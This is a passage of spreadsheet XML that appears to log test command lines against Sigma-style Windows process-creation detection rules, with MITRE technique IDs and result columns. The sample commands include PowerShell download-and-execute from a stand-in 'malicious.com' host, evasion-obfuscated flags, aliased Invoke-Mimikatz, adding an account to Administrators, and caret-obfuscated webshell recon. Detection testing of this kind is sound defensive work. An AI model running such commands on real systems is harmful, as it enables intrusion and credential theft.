      <c r="C453" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D453" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E453" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F453" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I453" s="36" t="n"/>
      <c r="J453" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K453" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="n"/>
      <c r="B454" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C454" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D454" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E454" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I454" s="36" t="n"/>
      <c r="J454" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K454" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="43" t="n"/>
      <c r="B455" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C455" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D455" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E455" s="36" t="inlineStr">
        <is>
          <t>cmd /C "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F455" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G455" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="43" t="n"/>
      <c r="J455" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K455" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B456" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C456" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D456" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E456" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="36" t="n"/>
      <c r="J456" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K456" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B457" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C457" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D457" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E457" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F457" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G457" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="43" t="n"/>
      <c r="J457" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K457" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B458" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C458" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D458" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E458" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="43" t="n"/>
      <c r="J458" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K458" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B459" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C459" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D459" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E459" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="43" t="n"/>
      <c r="J459" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K459" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B460" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C460" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D460" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E460" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F460" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G460" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I460" s="43" t="n"/>
      <c r="J460" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K460" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="n"/>
      <c r="B461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C461" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D461" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E461" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="43" t="n"/>
      <c r="J461" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="36" t="n"/>
      <c r="B462" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C462" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D462" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E462" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I462" s="36" t="n"/>
      <c r="J462" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K462" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="36" t="n"/>
      <c r="B463" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C463" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D463" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E463" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I463" s="43" t="n"/>
      <c r="J463" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K463" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="43" t="n"/>
      <c r="B464" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C464" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D464" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E464" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -cOMmAnd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="43" t="n"/>
      <c r="J464" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K464" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="36" t="n"/>
      <c r="B465" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C465" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D465" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E465" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I465" s="43" t="n"/>
      <c r="J465" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K465" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="43" t="n"/>
      <c r="B466" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C466" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D466" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E466" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="43" t="n"/>
      <c r="J466" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K466" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="36" t="n"/>
      <c r="B467" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C467" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D467" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E467" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="43" t="n"/>
      <c r="J467" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="36" t="n"/>
      <c r="B468" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C468" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D468" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E468" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F468" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G468" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H468" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="43" t="n"/>
      <c r="J468" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K468" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="36" t="n"/>
      <c r="B469" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C469" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D469" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E469" s="36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469" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G469" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H469" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="36" t="n"/>
      <c r="J469" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K469" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="36" t="n"/>
      <c r="B470" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C470" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D470" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E470" s="36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470" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G470" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="36" t="n"/>
      <c r="J470" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K470" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="36" t="n"/>
      <c r="B471" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C471" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D471" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E471" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"NoLogo" -noniNTeracTiVe -ep Bypass -CoMmand "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K471" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="43" t="n"/>
      <c r="B472" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C472" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D472" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E472" s="43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472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="n"/>
      <c r="B473" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C473" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D473" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E473" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NOLoGO -nONiNtERactivE -ep Bypass -"Command" "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="n"/>
      <c r="J473" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="36" t="n"/>
      <c r="B474" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C474" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D474" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E474" s="36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F474" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G474" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H474" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K474" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="36" t="n"/>
      <c r="B475" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C475" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D475" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E475" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NOlOgO -noNInteractivE -ep Bypass -"Command" "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="43" t="n"/>
      <c r="J475" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K475" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B476" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C476" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D476" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E476" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="36" t="n"/>
      <c r="J476" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K476" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B477" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C477" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D477" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E477" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F477" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G477" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H477" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I477" s="43" t="n"/>
      <c r="J477" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K477" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="36" t="n"/>
      <c r="B478" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_sysmon_discovery_via_default_altitude</t>
        </is>
      </c>
      <c r="C478" s="36" t="inlineStr">
        <is>
          <t>Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE</t>
        </is>
      </c>
      <c r="D478" s="36" t="inlineStr">
        <is>
          <t>37db85d1-b089-490a-a59a-c7b6f984f480</t>
        </is>
      </c>
      <c r="E478" s="36" t="inlineStr">
        <is>
          <t>fltmc.exe | Select-String "385201"</t>
        </is>
      </c>
      <c r="F478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="43" t="n"/>
      <c r="J478" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K478" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="36" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B479" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C479" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D479" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E479" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I479" s="43" t="n"/>
      <c r="J479" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B480" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C480" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D480" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E480" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="43" t="n"/>
      <c r="J480" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B481" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C481" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D481" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E481" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="43" t="n"/>
      <c r="J481" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K481" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B482" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C482" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D482" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E482" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I482" s="36" t="n"/>
